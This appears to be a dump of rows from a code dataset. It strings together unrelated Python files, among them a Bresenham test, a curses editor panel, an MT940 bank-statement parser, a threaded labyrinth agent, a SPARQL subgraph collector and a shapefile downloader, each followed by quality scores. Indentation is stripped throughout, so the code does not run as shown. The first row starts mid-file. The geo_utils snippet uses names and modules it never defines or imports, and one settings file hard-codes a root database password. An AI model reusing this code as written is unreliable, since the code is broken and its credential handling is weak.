'title': ['exact', 'icontains', 'istartswith'],
'author': ['exact', 'icontains', 'istartswith'],
'category': ['exact'],
}
interfaces = (relay.Node, )
class Query(AbstractType):
book = relay.Node.Field(BookNode)
book_page = relay.Node.Field(BookPageNode)
all_books = DjangoFilterConnectionField(BookNode)
all_pages = DjangoFilterConnectionField(BookPageNode)
| 2.15625 | 2 |
_unittests/ut_special/test_tsp_bresenham.py | Jerome-maker/ensae_teaching_cs | 73 | 12798038 | <reponame>Jerome-maker/ensae_teaching_cs<gh_stars>10-100
"""
@brief test log(time=10s)
"""
import unittest
import random
from ensae_teaching_cs.special.tsp_bresenham import draw_line, draw_ellipse
class TestTspBresenham(unittest.TestCase):
def test_bresenham(self):
x, y = 500, 500
for n in range(0, 10):
x1 = random.randint(0, x - 1)
y1 = random.randint(0, y - 1)
x2 = random.randint(0, x - 1)
y2 = random.randint(0, y - 1)
ligne1 = draw_line(x1, y1, x2, y2)
ligne2 = draw_line(x2, y2, x1, y1)
ligne2.reverse()
self.assertEqual(len(ligne1), len(ligne2))
draw_line(x2, y1, x1, y2)
draw_line(x1, y2, x2, y1)
def test_bresenham_ellipses(self):
x, y = 500, 500
for n in range(0, 10):
x1 = random.randint(0, x - 1)
y1 = random.randint(0, y - 1)
xa = random.randint(50, 100)
xb = random.randint(50, 100)
draw_ellipse(x1, y1, xa, xb)
if __name__ == "__main__":
unittest.main()
| 2.875 | 3 |
architecture/editor_manager.py | hkdeman/termineditor | 0 | 12798039 | from curses.textpad import rectangle
import curses
ORIGIN_Y, ORIGIN_X = 5,2
class EditorManager:
def __init__(self,std_scr):
self.std_scr = std_scr
self.height, self.width = self.std_scr.getmaxyx()
self.origin_y, self.origin_x = 5, 2
self.canvas_height, self.canvas_width = self.height//4-1, self.width//4-4
self.all_editors = {}
self.is_global_state = False
self.navigator = None
curses.init_pair(2, curses.COLOR_GREEN, curses.COLOR_BLACK)
def left(self):
pass
def right(self):
pass
def up(self):
pass
def down(self):
pass
def run(self):
pass
def clear_content(self):
for i in range(self.origin_y+2,self.canvas_height):
self.std_scr.addstr(i, self.origin_x," "*(self.canvas_width-2))
def show_title(self):
self.std_scr.addstr(self.origin_y, self.origin_x+1, "Open Editors")
self.std_scr.addstr(self.origin_y, self.canvas_width-3, "▼")
rectangle(self.std_scr, self.origin_y - 1, self.origin_x - 1, self.origin_y + 1, self.width // 4 - 4)
def show_content(self):
self.clear_content()
self.all_editors = {}
index, editors = self.navigator.context["Manager"].get_all_editor_names()
for i, editor in enumerate(editors):
self.all_editors[i] = editor
rectangle(self.std_scr, self.origin_y+1,self.origin_x-1,self.canvas_height, self.canvas_width)
for i, editor in self.all_editors.items():
if i == index:
self.std_scr.addstr(self.origin_y + i + 2, self.origin_x + 1, editor, curses.color_pair(2))
else:
self.std_scr.addstr(self.origin_y+i+2, self.origin_x+1, editor)
self.std_scr.refresh()
def display(self):
self.show_title()
self.show_content()
def update_global_status(self,status):
self.is_global_state = status
def set_navigator(self, navigator):
self.navigator = navigator | 2.703125 | 3 |
pybpodapi/com/messaging/debug.py | ckarageorgkaneen/pybpod-api | 1 | 12798040 | # !/usr/bin/python3
# -*- coding: utf-8 -*-
from pybpodapi.com.messaging.base_message import BaseMessage
class DebugMessage(BaseMessage):
""" Information line for things like experiment name , task name, board id, etc. """
MESSAGE_TYPE_ALIAS = "debug"
MESSAGE_COLOR = (200, 200, 200)
| 1.9375 | 2 |
metaphor/tableau/__main__.py | MetaphorData/connectors | 5 | 12798041 | from metaphor.common.cli import cli_main
from .extractor import TableauExtractor
if __name__ == "__main__":
cli_main("Tableau metadata extractor", TableauExtractor)
| 1.140625 | 1 |
generate/generate/tests/__init__.py | flamencist/browser-extensions | 102 | 12798042 | def dummy_config():
return {
'uuid': 'TEST-UUID',
'main': {
'server': 'https://test.forge.io/api/'
}
} | 1.4375 | 1 |
opentutorials_python2/opentutorials_python2/20_Object_and_Module/1_Object_and_Module.py | dongrami0425/Python_OpenCV-Study | 0 | 12798043 | <filename>opentutorials_python2/opentutorials_python2/20_Object_and_Module/1_Object_and_Module.py
# < 객체와 모듈 >
import lib # 모듈을 가져올 때 import 모듈_명
obj = lib.A() # lib라는 모듈의 A클래스에 대한 인스턴스화
print(obj.a())
| 1.914063 | 2 |
mt940_v2.py | bvermeulen/mt940---simple | 0 | 12798044 | #!/usr/bin/env python
import re
import sys
import decimal
from mt940m_v2 import ParseMT940
D = decimal.Decimal
# read and concatenate entire MT940 contents and add '-ABN' to make sure the last record is captured
if len(sys.argv)== 2:
argf = sys.argv[1]
else:
print('please provide a valid MT940 file')
exit()
text = open(argf).read().splitlines()
text = ''.join(text) +'-ABN'
payee = ''
memo = ''
total_amount = D('0')
bank_account = ''
fn = ''
# record: pattern to determine a MT940 record group, note more than one transaction
# is possible within a record
record_pat = re.compile(r'(?P<record>:\d\d.??:.*?(?=-ABN))')
# field_pat: pattern to seperate the fields in the MT940 file :num :field
field_pat = re.compile(r':(?P<num>\d\d).??:(?P<field>.*?(?=:\d\d.??:))')
# val61_pat: pattern to seperate the values in field 61
#:valuta (date) :date (transaction date and used for date) :sign :amount :code :reference
val61_pat = re.compile(r'(?P<valuta>\d{6})(?P<date>\d{4})(?P<sign>\D)'
r'(?P<amount>\d+[,.]\d*)(?P<code>\w{4})(?P<reference>\w+$)')
for match in re.finditer(record_pat, text):
# add token ':99:' to the end of the record to make sure the last field is also captured
record = match.group('record') +':99:'
# parse the string in a field number 'num' and its corresponding 'field'
for match in re.finditer(field_pat,record):
num = match.group('num')
field = match.group('field')
# in case field number is equal to '25' check if it is a new bank_account. If new make new qif file using
# the name of the bank account found in field '25'. Field 25 is assumed to be before field 61.
if num == '25':
# close the qif file if this is not the first instance
if field != bank_account and bank_account != '':
qif_file.close()
end_balance = start_balance + total_amount
print ('{}: start balance: {:.2f} / transfers: {:.2f} / end balance: {:.2f}' \
.format(fn, start_balance, total_amount, end_balance))
total_amount = D('0')
fn = ''
# open a new qif file if a new bank account is encountered
if field != bank_account:
bank_account = field
new_bank_flag = True
fn = argf.rsplit('.',1)[0] # make the file name the same as the 1st argument + some changes
fn = fn + '_' + bank_account +'.qif'
qif_file = open(fn,'w')
qif_file.write('!Type:Bank\n')
#find the start_balance for a new bank account in field 60
if num == '60' and new_bank_flag:
m=re.search(r'(\D)\d{6}.*?(?=[\d])(.*$)',field)
start_balance=D(ParseMT940.conv_amount_str(m.group(1),m.group(2)))
new_bank_flag = False
# in case field number is '61' handle the transaction using the information in field 61 and subsequent 86
if num == '61':
f61 = re.match(val61_pat, field)
f61_dict = f61.groupdict()
# in case field number is '86' handle to payee and memo and write the transaction to QIF
if num == '86':
date = ParseMT940.transaction_date_conversion(f61_dict['valuta'], f61_dict['date'])
amount = ParseMT940.conv_amount_str(f61_dict['sign'], f61_dict['amount'])
payee, memo = ParseMT940.code86(field, bank_account, date, amount)
total_amount += D(amount)
ParseMT940.write_qif_record (qif_file, date, amount, payee, memo)
# on finishing the program close the last qif_file
if fn !='':
qif_file.close()
end_balance = start_balance + total_amount
print ('{}: start balance: {:.2f} / transfers: {:.2f} / end balance: {:.2f}'.format(fn, start_balance, total_amount, end_balance))
else:
print('this is not a valid MT940 file')
| 2.96875 | 3 |
PokeBot/Load.py | danrneal/PokeBot | 0 | 12798045 | <filename>PokeBot/Load.py
import logging
import json
import sys
from collections import OrderedDict
from .Utilities.GenUtils import get_path
log = logging.getLogger('LoadConfig')
def parse_rules_file(manager, filename):
if str(filename).lower() == 'none':
return
filepath = get_path(filename)
rules = OrderedDict()
try:
log.info("Loading Rules from file at {}".format(filepath))
with open(filepath, 'r') as f:
rules = json.load(f, object_pairs_hook=OrderedDict)
if type(rules) is not OrderedDict:
log.critical(
"Rules files must be a JSON object: { \"monsters\":[...],... }"
)
raise ValueError("Rules file did not contain a dict.")
except ValueError as e:
log.error("Encountered error while loading Rules: {}: {}".format(
type(e).__name__, e))
log.error(
"PokeAlarm has encountered a 'ValueError' while loading the " +
"Rules file. This typically means the file isn't in the " +
"correct json format. Try loading the file contents into a " +
"json validator."
)
sys.exit(1)
try:
load_rules_section(manager.add_monster_rule, rules.pop('monsters', {}))
load_rules_section(manager.add_egg_rule, rules.pop('eggs', {}))
load_rules_section(manager.add_raid_rule, rules.pop('raids', {}))
for key in rules:
raise ValueError((
"Unknown Event type '{}'. Rules must be defined under the " +
"correct event type. See example in rules.json.example."
).format(key))
except Exception as e:
log.error(
"Encountered error while parsing Rules. This is because of a " +
"mistake in your Rules file."
)
log.error("{}: {}".format(type(e).__name__, e))
sys.exit(1)
def load_rules_section(set_rule, rules):
for name, settings in rules.items():
if 'filters' not in settings:
raise ValueError("{} rule is missing a `filters` section.".format(
name))
if 'alarms' not in settings:
raise ValueError("{} rule is missing an `alarms` section.".format(
name))
filters = settings.pop('filters')
alarms = settings.pop('alarms')
set_rule(name, filters, alarms)
if len(settings) > 0:
raise ValueError("Rule {} has unknown parameters: {}".format(
name, settings))
| 2.6875 | 3 |
Labyrint/Agent.py | flikkes/intelligente_agenten | 0 | 12798046 | import sys
import os
import Labyrinth
import time
import threading
class Agent:
num = 0
x = 0
y = 0
labyrinth = None
callback = None
def __init__(self, x, y, labyrinth, callback):
self.num = time.time()*1000
self.x = x
self.y = y
self.labyrinth = labyrinth
self.callback = callback
print(str(self.num)+': Created new agent. Exploring...')
t = threading.Thread(target=self.explore)
t.start()
def explore(self):
self.callback()
if self.labyrinth.finished or self.labyrinth.isVisited(self.x, self.y):
sys.exit()
walkableSpots = []
if (self.labyrinth.isFinish(self.x, self.y)):
print(str(self.num)+': Agent found the exit at x: '+str(self.x)+', y: '+str(self.y))
self.labyrinth.finished = True
sys.exit()
self.labyrinth.visit(self.x, self.y)
print('{}: Visiting {} {}'.format(str(self.num), self.x, self.y))
if (self.labyrinth.isWalkable(self.x-1, self.y)):
walkableSpots.append({'x': self.x-1, 'y': self.y})
if (self.labyrinth.isWalkable(self.x, self.y-1)):
walkableSpots.append({'x': self.x, 'y': self.y-1})
if (self.labyrinth.isWalkable(self.x+1, self.y)):
walkableSpots.append({'x': self.x+1, 'y': self.y})
if (self.labyrinth.isWalkable(self.x, self.y+1)):
walkableSpots.append({'x': self.x, 'y': self.y+1})
if (len(walkableSpots)==1):
self.x = walkableSpots[0]['x']
self.y = walkableSpots[0]['y']
t = threading.Thread(target=self.explore)
t.start()
if (len(walkableSpots)>1):
for num, spot in enumerate(walkableSpots, start = 1):
agent = Agent(spot['x'], spot['y'], self.labyrinth, self.callback)
self.x = walkableSpots[0]['x']
self.y = walkableSpots[0]['y']
t = threading.Thread(target=self.explore)
t.start()
if (len(walkableSpots) == 0):
print(str(self.num)+': Dead end reached, dying...')
sys.exit()
| 3.421875 | 3 |
adaptive_subgraph_collection/find_chains_in_full_KB.py | rajarshd/CBR-SUBG | 7 | 12798047 | <filename>adaptive_subgraph_collection/find_chains_in_full_KB.py<gh_stars>1-10
import os
from collections import defaultdict
from tqdm import tqdm
import pickle
from numpy.random import default_rng
import numpy as np
import argparse
import wandb
rng = default_rng()
from adaptive_subgraph_collection.adaptive_utils import get_query_entities_and_answers, \
get_query_entities_and_answers_cwq, execute_kb_query_for_hops, get_query_entities_and_answers_freebaseqa, \
get_query_entities_and_answers_metaqa, read_metaqa_kb, find_paths
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Collect subgraphs around entities using CBR")
parser.add_argument("--train_file", type=str,
default='/mnt/nfs/scratch1/rajarshi/cbr-weak-supervision/data_with_mentions/webqsp_data_with_mentions/train.json')
parser.add_argument("--dataset_name", type=str, default='webqsp')
parser.add_argument("--output_dir", type=str,
default='/mnt/nfs/scratch1/rajarshi/cbr-weak-supervision/subgraphs/webqsp_gold_entities')
parser.add_argument("--use_gold_entities", action='store_true')
parser.add_argument("--metaqa_kb_file", type=str, default="/mnt/nfs/scratch1/rajarshi/cbr-weak-supervision/MetaQA-synthetic/3-hop/kb.txt")
parser.add_argument("--job_id", type=int, default=0)
parser.add_argument("--total_jobs", type=int, default=1)
parser.add_argument("--use_wandb", type=int, default=1)
args = parser.parse_args()
args.use_wandb = (args.use_wandb == 1)
if args.use_wandb:
wandb.init("adaptive-subgraph-collection")
if args.dataset_name.lower() == 'webqsp':
qid2qents, qid2answers, qid2gold_chains, qid2q_str = get_query_entities_and_answers(args.train_file,
return_gold_entities=args.use_gold_entities)
elif args.dataset_name.lower() == 'cwq':
qid2qents, qid2answers, qid2gold_spqls, qid2q_str = get_query_entities_and_answers_cwq(args.train_file,
return_gold_entities=args.use_gold_entities)
elif args.dataset_name.lower() == 'freebaseqa':
qid2qents, qid2answers, qid2gold_spqls, qid2q_str = get_query_entities_and_answers_freebaseqa(args.train_file)
elif args.dataset_name.lower() == 'metaqa':
qid2qents, qid2answers, qid2gold_spqls, qid2q_str = get_query_entities_and_answers_metaqa(args.train_file,
return_gold_entities=args.use_gold_entities)
if args.dataset_name.lower() == 'metaqa': # metaqa has its own KB and not full Freebase, hence do not need SPARQL
# read metaqa KB
# find 1, 2, 3 hop paths between question entities and answers
all_subgraphs = defaultdict(list)
e1_map = read_metaqa_kb(args.metaqa_kb_file)
qid2qents = [(qid, q_ents) for (qid, q_ents) in sorted(qid2qents.items(), key=lambda item: item[0])]
job_size = len(qid2qents) / args.total_jobs
st = args.job_id * job_size
en = (1 + args.job_id) * job_size
print("St: {}, En: {}".format(st, en))
empty_ctr = 0
all_len = []
for ctr, (qid, q_ents) in tqdm(enumerate(qid2qents)):
if st <= ctr < en:
ans_ents = qid2answers[qid]
len_q = 0
for q_ent in q_ents:
for ans_ent in ans_ents:
paths = find_paths(e1_map, q_ent, ans_ent)
all_subgraphs[qid].append({'st': q_ent, 'en': ans_ent, 'chains': paths})
len_q += len(paths)
if len_q == 0:
empty_ctr += 1
all_len.append(len_q)
print("Empty_ctr: {} out of {} queries".format(empty_ctr, (en - st)))
out_file = os.path.join(args.output_dir, "{}_train_chains_{}.pkl".format(args.dataset_name.lower(), str(args.job_id)))
print("Writing file at {}".format(out_file))
with open(out_file, "wb") as fout:
pickle.dump(all_subgraphs, fout)
else:
all_subgraphs = defaultdict(list)
all_len = []
for ctr, (qid, q_ents) in tqdm(enumerate(qid2qents.items())):
ans_ents = qid2answers[qid]
for q_ent in q_ents:
for ans_ent in ans_ents:
spql_2_hop = "select distinct ?r1 ?r2 where { " + "ns:" + q_ent + " ?r1 ?e1 . ?e1 ?r2 ns:" + ans_ent + ". }"
ret = execute_kb_query_for_hops(spql_2_hop, hop=2)
is_exception = ret[1]
if not is_exception:
all_subgraphs[qid].append({'st': q_ent, 'en': ans_ent, 'chains': ret[0]})
all_len.append(len(ret[0]))
else:
print(spql_2_hop)
spql_1_hop = "select distinct ?r1 where { " + "ns:" + q_ent + " ?r1 ns:" + ans_ent + ". }"
ret = execute_kb_query_for_hops(spql_1_hop, hop=1)
if not is_exception:
all_subgraphs[qid].append({'st': q_ent, 'en': ans_ent, 'chains': ret[0]})
all_len.append(len(ret[0]))
else:
print(spql_1_hop)
# there are some qids for which the (above) query didnt execute because
# the entities are string literals and the queries above dont work
# To handle them, issue a special query that look for those strings in the
# immediate neighborhood. Unfortunately we can only look in the one-hop neighborhood.
# Doing more that takes way too much per query. Worth asking some SPARQL expert, how
# to handle such cases.
print("Number of queries: {}".format(len(all_subgraphs)))
empty_qids = set()
for qid, _ in qid2qents.items():
if qid not in all_subgraphs:
empty_qids.add(qid)
for empty_qid in tqdm(empty_qids):
q_ents = qid2qents[empty_qid]
answers = qid2answers[empty_qid]
for q_ent in q_ents:
for ans_ent in answers:
spql_1_hop_literal = "select distinct ?r1 where { " + "ns:" + q_ent + " ?r1 ?e1. FILTER(STR(?e1) = '" + ans_ent + "') }"
ret = execute_kb_query_for_hops(spql_1_hop_literal, hop=1)
is_exception = ret[1]
if not is_exception:
all_subgraphs[empty_qid].append({'st': q_ent, 'en': ans_ent, 'chains': ret[0]})
all_len.append(len(ret[0]))
else:
print(spql_1_hop_literal)
print("Number of queries after executing query for literals: {}".format(len(all_subgraphs)))
out_file = os.path.join(args.output_dir, "{}_2_hop_train_chains.pkl".format(args.dataset_name.lower()))
with open(out_file, "wb") as fout:
pickle.dump(all_subgraphs, fout)
print("Min: {}, Mean: {}, Median: {}, Max:{}".format(np.min(all_len), np.mean(all_len), np.median(all_len),
np.max(all_len)))
| 2.21875 | 2 |
instance_data/problem_printer.py | LuddeWessen/assembly-robot-manager-minizinc | 3 | 12798048 | # MIT License
#
# Copyright (c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
from problem_instance import Problem
class ProblemPrinter:
def __init__(self, fixture_order_raw, duration_rnd_seed, **kwargs):
self.p = Problem(fixture_order_raw = fixture_order_raw, **kwargs)
self.fixture_order_raw = fixture_order_raw
self.no_grip = None
self.no_suction = None
self.duration_rnd_seed = duration_rnd_seed
def GetFixtureOrderString(self):
s = ""
current = ""
for i in range(len(self.fixture_order_raw)):
if self.fixture_order_raw[i] == 0:
current = "G"
elif self.fixture_order_raw[i] == 1:
current = "S"
elif self.fixture_order_raw[i] == -1:
current = "_"
else:
current = "ERROR"
s = s + current
return s
def GetNoComp(self):
return self.p.no_grip + self.p.no_suction
def FilePrint(self, file_name_prefix):
"""
Printing File Header
"""
setup_file_name = file_name_prefix + str(self.GetNoComp()) + "_" + self.GetFixtureOrderString() + ".dzn"
file1 = open(setup_file_name,"w")
file1.write("%-----------------------------------------------------------------------------%\n")
file1.write("% Dual Arm Multi Capacity Multi Tool Scheduling / Routing\n")
file1.write("% Assembly Configuration\n")
file1.write("% Auto Generated by python script, authored by <NAME> \n")
file1.write("%-----------------------------------------------------------------------------%\n\n\n")
"""
Printing durations
"""
self.p.RandomizeTaskDurations(self.duration_rnd_seed)
file1.write("task_durations = ")
file1.write(self.p.GetDurationsOfTasksString(str_offset=len("task_durations = ")+1))
file1.write('\n\n\n')
"""
Printing task sets
"""
file1.write("TRAY_TASKS = " + self.p.TrayTasksToString() + ";\n")
file1.write("CAMERA_TASKS = " + self.p.CameraTasksToString() + ";\n")
file1.write("OUTPUT_TASKS = " + self.p.OutputTasksToString() + ";\n")
file1.write('\n\n')
file1.write("empty_gripper_tasks = " + self.p.PressTasksToString() + ";\n")
file1.write('\n\n')
"""
Printing Tool Pick and Place- orders
"""
# TODO: last row does not seem to have press - which it does no, since it is output
# However, we assume it does!
# Fix!
file1.write("gripper_pick_tasks_orders = " + self.p.GetPickTaskOrderString(0) + ";\n\n")
file1.write("suction_pick_tasks_orders = " + self.p.GetPickTaskOrderString(1) + ";\n\n")
file1.write("fixture_task_orders = " + self.p.GetFixtureTaskOrderString() + ";\n\n")
file1.close()
return setup_file_name
| 2.296875 | 2 |
src/settings.py | weskleydamasceno/Sorveteria_backend | 0 | 12798049 | #
# Configurações da aplicação
#
import os
from os.path import abspath
DEBUG = True
SECRET_KEY = 'a secret key'
# diretório base
basedir = os.path.abspath(os.path.dirname(__name__))
# diretório base da aplicação
BASE_DIR = basedir
# connection string: mysql://usuario:senha@host/nomedobanco
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:root@localhost/dbdevweb'
# SQLAlchemy monitorará modificações de objetos
SQLALCHEMY_TRACK_MODIFICATIONS = True | 2.03125 | 2 |
ds/beis_indicators/utils/geo_utils.py | nestauk/beis-indicators | 4 | 12798050 | <filename>ds/beis_indicators/utils/geo_utils.py
import geopandas as gpd
import os
from urllib.request import urlretrieve
from zipfile import ZipFile
from beis_indicators.utils.nuts_utils import NUTS_INTRODUCED, NUTS_ENFORCED
def get_shape(file_name, path):
'''
Utility function to extract and the shapefile
Arguments:
url: url for the shapefile zip
file_name: name of the file where we want to extract the data
'''
#Do we need to get the data or is it already there?
shape_names = os.listdir(f'{project_dir}/data/raw/shapefiles')
if file_name not in shape_names:
#Get the data
print(f'getting {file_name}...')
#Get url
url = shape_lookup[file_name]
#Request data
req = requests.get(url)
#Parse the content
z = ZipFile(BytesIO(req.content))
#Save
print(f'saving {file_name}...')
z.extractall(f'{path}{file_name}')
else:
print(f'{file_name} already collected')
| 3.34375 | 3 |
Subsets and Splits